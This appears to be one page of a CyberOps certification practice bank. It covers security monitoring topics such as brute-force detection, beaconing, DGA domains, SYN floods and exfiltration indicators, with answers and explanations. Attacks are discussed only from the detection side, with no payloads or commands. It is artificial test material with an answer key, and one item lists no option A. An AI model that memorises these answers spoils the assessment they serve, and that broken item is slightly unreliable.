Option B is wrong because ssl.log records SSL/TLS handshake details and certificate information, but not the full HTTP request URL or host header, so it cannot directly show HTTP requests to a domain (though SNI may be present). Option C is wrong because conn.log records connection-level metadata (IPs, ports, duration, bytes) but not application-layer HTTP details like the requested domain or URI. Option D is wrong because dns.log records DNS queries and responses, which can show that a domain was resolved, but not the subsequent HTTP requests to that domain.

129
Multi-Selecthard

An analyst is reviewing web server logs and sees the following entries: 'GET /admin/login.php HTTP/1.1' returning 404, followed by 'GET /admin/login.html' returning 404, then 'GET /admin/login.asp' returning 200. Which TWO observations are most relevant?

Select 2 answers
A.The attacker is probing for valid login page paths
B.The requests indicate a brute-force login attempt
C.The source IP is likely performing a SQL injection
D.The server is misconfigured to reveal directory listings
E.The successful 200 response indicates the attacker accessed the login page
AnswersA, E

Requesting the same path with .php, .html, then .asp extensions, mostly returning 404, shows systematic enumeration of login page filenames. The attacker is probing for valid login page paths rather than exploiting a known vulnerability.

Why this answer

Option A is correct because the sequence of GET requests for /admin/login.php, /admin/login.html, and /admin/login.asp shows the source systematically trying different file extensions to discover a valid login page path, which is classic forced-browsing or path enumeration behavior. Option E is correct because the final request returned HTTP 200, meaning the server successfully served /admin/login.asp, so the attacker did reach a valid login page. Option B is not supported because brute-force attacks involve repeated authentication attempts with credential guesses, not simple GET requests for different filenames.

Option C is not supported because SQL injection would require malicious input in parameters or payloads, and none is shown in these URLs. Option D is not supported because a 404 response indicates the requested resource was not found, not that directory listings were exposed.

Exam trap

The trap here is confusing enumeration (probing for valid paths) with brute-force (guessing credentials) or injection attacks, as all involve multiple requests to a login page.

130
MCQmedium

A SOC analyst is reviewing network telemetry from Cisco Stealthwatch and notices a host inside the corporate network initiating repeated outbound connections to a single external IP address. Each connection is short-lived (less than 5 seconds) and occurs at irregular intervals, with varying destination ports. The analyst suspects command-and-control activity. Which approach would best confirm this suspicion using available telemetry?

A.Correlate NetFlow records with DNS logs to identify the domain associated with the external IP and check its reputation.
B.Review firewall logs to see if any inbound connections from the external IP were blocked.
C.Capture full packet data for the host and inspect the payload for known malware signatures.
D.Check the host's ARP cache for entries mapping the external IP to a MAC address.
AnswerA

Correlating NetFlow records with DNS logs links the external IP to a domain, which can then be checked against threat intelligence. This confirms whether the destination is a known C2 server. Short-lived connections with varying ports are typical of beaconing, and identifying the domain helps validate the suspicion, making this the most effective approach.

Why this answer

The correct approach is to correlate NetFlow data with DNS logs. NetFlow reveals the external IP and connection patterns, while DNS logs can link that IP to a domain. Checking the domain's reputation against threat intelligence confirms whether it is associated with known C2 infrastructure.

This method leverages existing telemetry efficiently and is a standard practice in security monitoring.

Exam trap

The trap here is assuming that full packet capture is always necessary, when flow and DNS correlation often provide faster and sufficient confirmation of C2 activity.

131
MCQmedium

A network administrator is creating a baseline for normal traffic patterns. Which of the following should be considered typical for a web server during business hours?

A.High volume of TCP SYN packets to port 443
B.High volume of DNS queries to external domains
C.High volume of SSH connections on port 22
D.High volume of ICMP echo requests
AnswerA

A web server accepting HTTPS connections legitimately receives many TCP SYN packets to port 443 as clients initiate TLS handshakes. This high connection-initiation volume is expected baseline behaviour during business hours, distinguishing normal client demand from anomalies such as scanning or denial-of-service floods.

Why this answer

A web server during business hours typically receives a high volume of incoming TCP SYN packets to port 443 (HTTPS) as clients initiate secure connections. This is normal traffic for a web server providing HTTPS services. The SYN packets are part of the TCP three-way handshake for new connections, and a high volume is expected during peak usage.

Exam trap

The trap is selecting DNS queries as typical because web servers do resolve domains, but the volume is usually low; the most typical high-volume traffic is incoming HTTPS connections (SYN to 443).

How to eliminate wrong answers

Option B is wrong because while a web server may make some DNS queries for external resources, a high volume of DNS queries to external domains is not typical for a web server's normal operation; it could indicate malware or misconfiguration. Option C is wrong because a high volume of SSH connections on port 22 is not typical for a web server; SSH is for management, and such traffic would be suspicious. Option D is wrong because a high volume of ICMP echo requests (pings) is not typical for a web server's normal business traffic; it could indicate scanning or a ping flood.

132
MCQmedium

In Wireshark, an analyst follows a TCP stream and sees plaintext usernames and passwords. Which protocol is likely in use?

B.SFTP
C.FTP
D.SSH
AnswerC

FTP transmits credentials in cleartext over TCP, so a followed stream exposes usernames and passwords directly. Unlike FTPS or SFTP, which negotiate TLS or SSH encryption before authentication, plain FTP offers no confidentiality, matching the plaintext credentials observed in the capture.

Why this answer

FTP (File Transfer Protocol) transmits data, including login credentials, in cleartext over TCP. When an analyst follows a TCP stream in Wireshark and sees plaintext usernames and passwords, it indicates that no encryption is applied. HTTPS, SFTP, and SSH all encrypt their payloads, so credentials would not be visible in plaintext.

Therefore, FTP is the likely protocol.

Exam trap

The trap here is confusing FTP with SFTP or assuming that all file transfer protocols are encrypted; candidates might overlook that FTP sends credentials in plaintext while SFTP and FTPS do not.

How to eliminate wrong answers

Option A is wrong because HTTPS uses TLS/SSL to encrypt HTTP traffic, so usernames and passwords would be encrypted and not visible in plaintext. Option B is wrong because SFTP (SSH File Transfer Protocol) runs over SSH and encrypts all data, including authentication credentials. Option D is wrong because SSH provides an encrypted tunnel for remote login and file transfers, so credentials are not sent in cleartext.

133
MCQhard

A threat hunter reviews Cisco Stealthwatch flow data and sees an internal server sending periodic 300-byte outbound flows to an external IP every 60 seconds, with consistent packet sizes and no matching inbound response beyond TCP acknowledgments. The server's DNS queries for that IP resolve through a newly registered domain. Which monitoring approach best characterizes this activity as beaconing rather than normal application traffic?

A.Compare the flow's byte count against the organization's top-talkers report
B.Check whether the destination IP appears on a threat intelligence blocklist
C.Analyze flow periodicity and packet-size consistency over time
D.Verify that the server's operating system is fully patched and current
AnswerC

Beaconing is identified by repeated connections at regular intervals with near-constant payload sizes, which distinguishes it from bursty or variable user-driven traffic. Stealthwatch's flow records preserve timestamps and byte counts, so plotting inter-arrival times and sizes exposes the 60-second cadence. Correlating that pattern with the newly registered domain strengthens the characterization of automated C2 beaconing rather than normal application behavior.

Why this answer

Beaconing is a behavioral pattern characterized by regular connection intervals and consistent payload sizes, often with minimal server response. Flow telemetry preserves the timing and byte counts needed to detect that cadence, so periodicity and size consistency analysis is the right approach. Volume ranking, blocklist matching, and patch verification do not evaluate the temporal pattern that separates automated C2 from normal traffic.

Exam trap

The trap here is focusing on the low byte count and concluding the traffic is too small to matter instead of examining its timing regularity.

134
MCQhard

A Zeek connection log shows a high number of connections from a single internal IP to many different external IPs on port 25, with small payload sizes. Which behavior is most likely indicated?

A.DNS tunneling
B.Secure web browsing
C.Data exfiltration using FTP
D.Spam email campaign or SMTP scanning
AnswerD

Many outbound connections to diverse external hosts on port 25, with tiny payloads, indicate SMTP scanning or spam relay activity. A legitimate mail server contacts few destinations with larger message bodies; this fan-out pattern from one internal host satisfies the stem's high-connection, small-payload constraint.

Why this answer

Port 25 is the default SMTP port used for email transmission. A high volume of connections from a single internal IP to many different external IPs on port 25, with small payload sizes, is characteristic of a spam email campaign or SMTP scanning. This pattern suggests the host is either sending bulk spam emails or probing external mail servers for open relay or user enumeration.

Exam trap

Cisco often tests the association of well-known ports with their protocols, and the trap here is that candidates may confuse port 25 with other common ports like 53 (DNS) or 21 (FTP), leading them to select DNS tunneling or FTP exfiltration instead of recognizing the SMTP spam pattern.

How to eliminate wrong answers

Option A is wrong because DNS tunneling typically uses UDP port 53 (or TCP 53 for large queries) and involves encoding data in DNS queries/responses, not SMTP port 25. Option B is wrong because secure web browsing uses HTTPS on port 443, not port 25, and would show larger payload sizes due to encrypted web content. Option C is wrong because data exfiltration using FTP would use port 21 (control) or port 20 (data), not port 25, and would involve larger file transfers rather than small payloads.

135
MCQeasy

A security analyst is reviewing a Wireshark capture and notices a large number of TCP SYN packets sent to multiple ports on a single host from the same source IP. Which type of network activity is most likely being observed?

A.DNS amplification attack
B.ARP spoofing
C.Port scan
D.Man-in-the-middle attack
AnswerC

TCP SYN packets to many ports on one host from a single source form the classic half-open scan pattern: the attacker sends SYNs without completing handshakes, seeking open ports. This fan-out to numerous ports on a single target distinguishes scanning from normal connection attempts.

Why this answer

A port scan is characterized by multiple connection attempts to different ports on a target host, often using SYN packets.

136
MCQmedium

A security analyst is investigating a potential brute force attack. Which SIEM correlation rule would best detect this activity?

A.Alert on a single failed login from any IP
B.Alert when more than 10 failed logins from the same IP occur within one minute
C.Alert when a successful login occurs after midnight
D.Alert when a user logs in from a new geographic location
AnswerB

Counting failed logins per source IP within one minute detects the rapid, repeated authentication attempts from one origin that define brute forcing, filtering out isolated failures. This logic directly identifies the activity the analyst is investigating.

Why this answer

A typical brute force detection rule monitors for multiple failed authentication attempts from the same source within a short time window.

137
MCQmedium

A SIEM correlation rule triggers an alert when more than 10 failed login attempts from the same source IP occur within 60 seconds. Which attack is this rule designed to detect?

A.Phishing attack
B.Man-in-the-middle
C.SQL injection
D.Brute force attack
AnswerD

Repeated authentication failures from one source within a short window match the brute force pattern, where an attacker rapidly guesses credentials against a single account or host. The rule's thresholds — more than 10 attempts in 60 seconds from the same IP — directly encode that volume-based signature.

Why this answer

This SIEM rule detects a brute force attack by correlating a high volume of failed login attempts (more than 10) from the same source IP within a short time window (60 seconds). Brute force attacks rely on rapid, repeated authentication attempts to guess credentials, and this threshold-based correlation is a classic detection method for such behavior.

Exam trap

Cisco often tests the distinction between brute force and other attack types by focusing on the specific behavior of repeated failed logins from a single source, which candidates may confuse with phishing or SQL injection due to overlapping terminology like 'credential theft' or 'authentication bypass'.

How to eliminate wrong answers

Option A is wrong because phishing attacks involve social engineering to trick users into revealing credentials or installing malware, not automated failed login attempts from a single IP. Option B is wrong because man-in-the-middle attacks intercept or modify communications between two parties, typically without generating repeated failed logins from one source. Option C is wrong because SQL injection exploits vulnerabilities in database queries via input fields, not through authentication failure logs or repeated login attempts.

138
MCQhard

A security analyst is using Cisco Umbrella and notices a high volume of DNS queries from a single internal host to randomly generated domain names that do not resolve. The queries are for domains like 'a1b2c3d4.com', 'e5f6g7h8.net', etc. What type of malicious activity is most likely occurring?

A.Domain generation algorithm (DGA) used by malware for command and control.
B.A phishing campaign attempting to redirect users to fake websites.
C.A misconfigured application repeatedly querying non-existent domains.
D.DNS tunneling for data exfiltration.
AnswerA

DGAs generate many random domain names that malware queries to locate its C2 server. The high volume of non-resolving queries to random domains is a classic sign of DGA activity. Cisco Umbrella would log these queries, and the pattern of random, unresolvable domains strongly indicates malware attempting to establish C2 communication.

Why this answer

The high volume of DNS queries to randomly generated, non-resolving domains is a hallmark of a domain generation algorithm (DGA). Malware uses DGAs to generate many potential C2 domains, hoping one will resolve and allow communication. Cisco Umbrella logs these queries, and the pattern is a strong indicator of infection.

DNS tunneling and misconfigurations would present differently.

Exam trap

The trap here is confusing DGA with DNS tunneling; DGA generates many random domains, while tunneling uses a single domain with encoded data.

139
MCQhard

An analyst is triaging an alert generated by Cisco Secure Network Analytics (Stealthwatch) showing a host inside the network communicating with a known command-and-control IP. The analyst wants to determine whether the communication has already resulted in data theft. Which additional telemetry source would provide the most direct evidence of successful exfiltration?

A.DHCP lease logs showing the internal host renewed its IP address.
B.NetFlow records showing outbound byte volume from the internal host to the C2 address.
C.Authentication logs showing the user logged into the host via RDP.
D.Syslog entries from the host's antivirus agent showing a signature update occurred.
AnswerB

NetFlow volume counters directly quantify how much data left the internal host toward the command-and-control address. A large, sustained outbound byte count relative to the host's normal baseline is the most direct flow-level indicator that data was actually transferred rather than merely attempted. This makes it the strongest evidence of successful exfiltration among the available telemetry sources.

Why this answer

Confirming exfiltration requires evidence of data actually leaving the network. NetFlow byte counters toward the command-and-control address provide that measurement directly and can be compared against the host's normal egress baseline. Signature updates, DHCP leases, and authentication events are useful for context and attribution but cannot quantify outbound transfer volume, so they do not answer whether theft occurred.

Exam trap

The trap here is equating detection of command-and-control contact with proof of data theft; contact alone shows a channel exists, while flow byte counts are what demonstrate that data actually moved across it.

140
MCQeasy

A security analyst is investigating an alert from a Windows system log that shows multiple failed logon attempts for the same user account within a short period, followed by a successful logon. Which type of attack does this pattern suggest?

A.Brute-force attack
B.Pass-the-hash attack
C.Denial-of-service attack
D.Phishing attack
AnswerA

Repeated failed logons for one account followed by success is the signature of a brute-force attack, where an attacker systematically guesses credentials until one works. The volume within a short window distinguishes it from isolated user error.

Why this answer

A burst of failed logons for one account followed by a success is the classic signature of a brute-force (or password-spraying) attack that eventually guessed the correct credential. Windows Security log events 4625 (failed logon) repeated, then 4624 (successful logon), from the same source within a short window confirm this. The pattern indicates the attacker iterated passwords until one worked.

Exam trap

200-201 often tests the difference between brute force (many failures then success on one account) and password spraying (one failure per many accounts) — candidates pick brute force for both, or confuse the failed-then-success pattern with pass-the-hash, which never shows failures.

How to eliminate wrong answers

Option B is wrong because pass-the-hash uses a stolen NTLM hash to authenticate directly — it produces a successful logon (4624 with logon type 3/9) without a preceding storm of 4625 failures. Option C is wrong because a DoS attack aims to make a service unavailable (SYN floods, resource exhaustion) and does not produce a sequence of failed-then-successful authentication events. Option D is wrong because phishing steals credentials via a fake page or email; the resulting logon would typically be a single success from an unusual location, not repeated failures followed by success on the same account.

141
MCQeasy

A network security analyst is reviewing firewall logs and sees repeated denied inbound connection attempts from various external IP addresses to TCP port 3389 on several internal hosts. Which type of activity does this most likely represent?

A.A brute-force attack against Remote Desktop Protocol
B.A denial-of-service attack targeting the RDP service
C.A misconfigured application attempting to connect to a database
D.A legitimate remote administration session from an IT administrator
AnswerA

Port 3389 is used by Microsoft Remote Desktop Protocol (RDP). Repeated inbound connection attempts from multiple external IPs to this port indicate an attempt to gain unauthorized access, often through brute-force or password spraying. The fact that the connections are denied means the firewall is blocking them, but the pattern is characteristic of an RDP brute-force attack.

Why this answer

Port 3389 is the default for Microsoft RDP. Multiple external IPs attempting to connect to this port on internal hosts, with the firewall denying the connections, is a classic sign of an RDP brute-force or scanning attack. Legitimate administrative sessions would come from trusted sources and likely succeed.

DoS would involve higher volume from fewer sources, and database connections would use different ports. The correct answer is a brute-force attack against RDP.

Exam trap

The trap here is assuming that any traffic to port 3389 is legitimate remote administration, overlooking that external IPs attempting to connect is a major red flag.

142
MCQeasy

A network security analyst is configuring a SPAN session on a Cisco switch so that a Cisco Firepower sensor can inspect traffic between the internal user VLAN and the internet-facing router. The switch has a single physical uplink carrying that traffic. Which configuration goal must the analyst keep in mind to ensure the sensor receives complete sessions?

A.The sensor interface must be set to promiscuous mode and assigned an IP address on the monitored VLAN.
B.The SPAN session must be configured with the encapsulation replicate option to copy VLAN tags.
C.The SPAN source must include both transmit and receive directions of the monitored interface.
D.The SPAN destination port must be configured as a trunk carrying all VLANs.
AnswerC

To reconstruct complete TCP sessions, the sensor needs to see packets flowing in both directions. If only one direction is mirrored, the sensor sees half-conversations, which degrades detection and can prevent session reassembly. Configuring the source interface to capture both ingress and egress traffic is therefore the essential requirement for this deployment.

Why this answer

Session reassembly requires visibility into both directions of a conversation. When a SPAN source mirrors only one direction, the sensor sees SYN packets without replies or requests without responses, crippling detection and logging. Configuring the source to capture both transmit and receive traffic on the monitored interface ensures the sensor receives full bidirectional sessions for accurate analysis.

Exam trap

The trap here is focusing on destination-port settings like trunking or VLAN tag replication, when the actual determinant of complete session capture is mirroring both directions at the SPAN source.

143
MCQeasy

In the OSI model, which layer is primarily targeted by a SYN flood attack?

A.Network Layer (Layer 3)
B.Application Layer (Layer 7)
C.Transport Layer (Layer 4)
D.Data Link Layer (Layer 2)
AnswerC

A SYN flood exploits the TCP three-way handshake by sending repeated SYN packets without completing the connection, exhausting the backlog of half-open connections. This handshake operates at the Transport Layer (Layer 4), so that layer is the attack's direct target.

Why this answer

A SYN flood attack targets the Transport Layer (Layer 4) by exploiting the TCP three-way handshake. The attacker sends a high volume of SYN packets with spoofed source IP addresses, causing the target server to allocate resources for half-open connections that never complete, eventually exhausting its connection queue and denying service to legitimate users.

Exam trap

Cisco often tests the distinction between the Transport Layer (Layer 4) and the Network Layer (Layer 3), where candidates mistakenly associate IP spoofing (a Layer 3 technique) with the attack's target layer, rather than recognizing that the attack exploits TCP's stateful handshake at Layer 4.

How to eliminate wrong answers

Option A is wrong because the Network Layer (Layer 3) handles IP routing and packet forwarding, not the TCP handshake mechanics that SYN floods exploit. Option B is wrong because the Application Layer (Layer 7) deals with protocols like HTTP, DNS, and SMTP, whereas SYN floods operate below this layer at the transport protocol level. Option D is wrong because the Data Link Layer (Layer 2) manages MAC addresses and frame delivery on a local network segment, and has no role in TCP connection state management.

144
MCQhard

A network engineer is deploying a Cisco Next-Generation IPS (NGIPS) in inline mode. The security team wants to ensure that the device can block malicious traffic while also providing contextual information about the attack. Which of the following Cisco NGIPS features provides detailed information about the attack and the target, including vulnerability mapping?

A.FireSIGHT (now Cisco Firepower) correlation and impact flags
B.Access Control Policy with URL filtering
C.Network Analysis Policy (NAP)
D.Security Intelligence (SI)
AnswerA

FireSIGHT (now integrated into Cisco Firepower) correlates intrusion events with host vulnerability data to provide impact flags and contextual information. This helps analysts understand the severity and potential impact of an attack by mapping it to known vulnerabilities on the target host.

Why this answer

The correct answer is the feature that correlates intrusion events with host vulnerability data. Cisco Firepower's FireSIGHT technology provides impact flags that indicate whether an attack is relevant to the target's vulnerabilities, giving analysts the context needed to prioritize response. This goes beyond simple signature matching.

Exam trap

The trap here is confusing policy configuration features with analysis and contextual features; only FireSIGHT provides vulnerability mapping and impact assessment.

145
MCQhard

A NetFlow report shows that host 10.0.0.5 has sent 1 GB of data to external IP 198.51.100.10 over port 443 in the last hour, while other hosts average 100 MB. This anomaly is most indicative of:

A.Port scan activity
B.Normal video streaming
C.DNS amplification attack
D.Data exfiltration
AnswerD

Sustained outbound transfer over port 443 to one external address, at ten times the peer baseline, indicates data leaving the network. Port 443 is commonly abused to blend with HTTPS traffic, and the volume deviation from other hosts satisfies the anomaly constraint in the stem.

Why this answer

The sudden, disproportionate egress of 1 GB of data from a single host to an external IP over port 443 (HTTPS) is a classic indicator of data exfiltration. While HTTPS traffic is common, the volume anomaly—10x the average of other hosts—suggests unauthorized copying of sensitive data, as attackers often use encrypted channels to blend in with normal traffic.

Exam trap

Cisco often tests the distinction between 'volume anomalies' and 'connection anomalies'—the trap here is confusing a large data transfer (exfiltration) with a volumetric attack (like DDoS) or reconnaissance (like port scanning), when the key is the direction and volume of the traffic to a single external host.

How to eliminate wrong answers

Option A is wrong because port scan activity typically generates many small packets to multiple ports or IPs, not a large volume of data to a single destination over a single port. Option B is wrong because normal video streaming would show consistent, high-bandwidth flows from many hosts, not a single host sending 10x the average to one external IP. Option C is wrong because a DNS amplification attack uses small queries to generate large responses to a victim, characterized by high UDP traffic on port 53, not a single host sending large amounts of TCP data over port 443.

146
MCQeasy

Which protocol and port combination is commonly used for secure remote administration of network devices?

A.Telnet on port 23
B.SSH on port 22
C.RDP on port 3389
D.HTTP on port 80
AnswerB

SSH encrypts the entire session, including credentials and commands, unlike Telnet on port 23, which transmits everything in cleartext. Port 22 is SSH's registered port, so it satisfies the requirement for secure remote administration of network devices.

Why this answer

SSH (Secure Shell) on port 22 is the correct answer because it provides encrypted, authenticated remote administration of network devices, replacing insecure protocols like Telnet. SSH uses public-key cryptography to establish a secure channel over an unsecured network, ensuring confidentiality and integrity of management traffic. This is the standard for secure CLI-based device management in enterprise environments.

Exam trap

Cisco often tests the distinction between Telnet and SSH, where candidates mistakenly choose Telnet because it is historically common for device management, forgetting that the question explicitly asks for 'secure' remote administration.

How to eliminate wrong answers

Option A is wrong because Telnet uses port 23 but transmits all data, including credentials, in cleartext, making it vulnerable to packet sniffing and man-in-the-middle attacks; it is not secure. Option C is wrong because RDP (Remote Desktop Protocol) on port 3389 is designed for remote GUI access to Windows desktops and servers, not for CLI-based network device administration. Option D is wrong because HTTP on port 80 is unencrypted and used for web traffic, not for secure remote administration; HTTPS (port 443) would be the secure alternative for web-based management.

147
MCQmedium

A security analyst observes a NetFlow record showing a single internal IP communicating with many external IPs on port 445 within seconds. This pattern is indicative of:

A.DNS tunneling
B.Data exfiltration
C.SMB scanning
D.Port scan
AnswerC

SMB scanning matches the record precisely: port 445 is SMB, and one internal host contacting many external IPs within seconds indicates horizontal sweeps seeking exposed file shares. The high fan-out and short timeframe satisfy the stem's beaconing-free, rapid connection pattern, distinguishing it from single-target exploitation or data transfer.

Why this answer

A single internal host contacting many external IPs on TCP/445 in a short window is the signature of SMB scanning — the host is enumerating SMB services across the internet or a target range. Port 445 is the SMB-over-TCP port, and the fan-out to many destinations distinguishes scanning from a single-target connection. This is often a precursor to SMB exploitation (EternalBlue, SMBGhost) or lateral movement.

Exam trap

200-201 often tests the distinction between a port scan (many ports, few hosts) and service scanning (one port, many hosts) — candidates default to 'port scan' whenever they see many connections, missing that the single-port fan-out indicates SMB service enumeration.

How to eliminate wrong answers

Option A is wrong because DNS tunneling uses UDP/TCP port 53 with encoded subdomains, not port 445 to many external IPs. Option B is wrong because data exfiltration typically shows large outbound transfers to a small number of destinations, not many short connections to many IPs on one port. Option D is wrong because a generic port scan would hit many ports on one or a few hosts; here the pattern is one port (445) across many hosts, which is service-specific scanning, not a broad port sweep.

148
Multi-Selecthard

A SOC analyst is correlating multiple data sources after a suspected web application compromise on an internet-facing server. The analyst has access to web server logs, firewall logs, and endpoint detection and response (EDR) telemetry. Which TWO log sources or record types would most directly help identify the initial exploitation attempt and the subsequent post-exploitation activity? (Choose two.)

Select 2 answers
A.Web server access logs containing HTTP request methods, URIs, status codes, and user-agent strings
B.DHCP lease logs from the corporate network
C.EDR process creation and command-line telemetry from the web server host
D.Firewall logs showing allowed and denied connections between the internet and the DMZ
E.Switch port mirroring statistics showing interface utilization
AnswersA, C

Web server access logs record each request's method, URI, status code, and user-agent, making them the primary source for spotting exploitation attempts such as SQL injection, path traversal, or command injection in request parameters. They reveal the initial attack vector and timing, which anchors the rest of the investigation. Correlating these entries with endpoint activity identifies the exploited process and any spawned child processes.

Why this answer

Web server access logs expose the initial malicious HTTP request and its parameters, while EDR process and command-line telemetry reveals the resulting execution on the host, such as spawned shells or web shell activity. Together they connect the attack vector to post-exploitation behavior. Firewall, DHCP, and interface statistics provide useful context but lack the application and endpoint detail required to attribute and reconstruct the intrusion.

Exam trap

The trap here is selecting network-layer sources such as firewall logs because they sound comprehensive, when identifying exploitation and post-exploitation activity requires application-layer and endpoint-level telemetry.

149
Multi-Selectmedium

A SOC analyst is correlating events in the SIEM after an alert fired for suspicious PowerShell execution on a workstation. The analyst wants to identify additional evidence that would support a ransomware pre-encryption hypothesis. Which two telemetry findings would most strongly support that hypothesis? (Choose two.)

Select 2 answers
A.A spike in SMB write operations to many file shares from a single workstation account.
B.A DHCP lease renewal for the workstation recorded by the local DHCP server.
C.Volume shadow copy deletion events recorded in Windows event logs.
D.An increase in DNS queries for known advertising domains from the workstation.
E.Successful Windows Update installations completing on the workstation overnight.
AnswersA, C

Rapid, widespread writes to numerous network file shares from one account is consistent with a ransomware binary encrypting shared data after initial execution. This pattern distinguishes encryption activity from normal user file access, which is typically limited in scope. Combined with suspicious script execution, it provides strong corroboration of an active or imminent ransomware incident.

Why this answer

Pre-encryption ransomware activity typically includes destroying recovery options and then rapidly encrypting data. Volume shadow copy deletion removes local restore points, while a burst of SMB writes to many shares shows encryption spreading across network storage. Together they form a coherent pattern that corroborates the suspicious PowerShell execution far better than routine DNS, update, or DHCP events.

Exam trap

The trap here is treating any unusual endpoint or network event as supporting evidence, when only behaviors tied to destroying backups and mass-encrypting files actually align with ransomware staging.

150
MCQeasy

Which port is used by RDP (Remote Desktop Protocol) and is a common target for brute force attacks?

A.443
B.3389
C.22
D.1433
AnswerB

RDP listens on TCP port 3389 by default, so this directly satisfies the stem's requirement. Attackers repeatedly target 3389 with brute force credential attempts because exposed RDP endpoints accept authentication requests, making weak passwords exploitable. Restricting access via Microsoft Entra ID conditional access or a VPN mitigates this exposure.

Why this answer

RDP (Remote Desktop Protocol) operates by default on TCP port 3389, a fact that makes it a prime target for brute force attacks because it provides direct interactive access to Windows systems. Attackers frequently scan for open 3389 ports and attempt credential stuffing or password spraying to gain unauthorized remote access. The other ports listed are associated with different services: 443 for HTTPS, 22 for SSH, and 1433 for Microsoft SQL Server.

Exam trap

The trap here is confusing RDP with other common remote access or web protocols, especially SSH on port 22 or HTTPS on 443, because candidates may associate 'remote' with SSH or 'secure' with 443, overlooking that RDP specifically uses 3389.

How to eliminate wrong answers

Option A is wrong because port 443 is used by HTTPS (HTTP over TLS/SSL) for secure web traffic, not RDP. Option C is wrong because port 22 is the default for SSH (Secure Shell), which is a secure remote command-line protocol, not RDP. Option D is wrong because port 1433 is the default port for Microsoft SQL Server database connections, not remote desktop services.

← PreviousPage 2 of 3 · 159 questions totalNext →

Ready to test yourself?

Try a timed practice session using only Cbrops Security Monitoring questions.